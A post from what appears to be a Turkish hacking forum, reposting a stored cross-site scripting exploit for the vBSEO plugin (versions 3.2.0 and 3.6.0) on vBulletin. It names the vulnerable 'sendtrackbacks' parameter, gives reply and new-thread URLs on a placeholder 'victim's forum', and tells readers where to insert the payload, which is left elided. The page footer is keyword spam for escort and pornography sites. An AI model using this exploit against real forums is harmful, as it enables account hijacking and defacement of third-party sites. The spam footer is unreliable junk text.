KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
vBulletin vBSEO 3.2.0 / 3.6.0 Cross Site Scripting
Konu : vBulletin vBSEO 3.2.0 / 3.6.0 Cross Site Scripting - 26.11.2013, 23:01
Mesaj: #1
Kod:
Exploit Title : Cross Site Scripting ( XSS - Stored ) vulnerability in
vBulletin SEO Plugin vBSEO.
Tested versions : vBSEO 3.2.0 & vBSEO 3.6.0
Tested with : vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter : sendtrackbacks
POC :

http://www.kurbanınforumu.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.kurbanınforumu.com/forum/newthread.php?do=newthread&f=

In Advanced Reply Or New Thread page, Put your ">vector in "Trackback"
Options.


 
Düşsede Kalkan Rocky Gibiyim :F1
- Byt3 is back..


WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort türk ifşa hd porno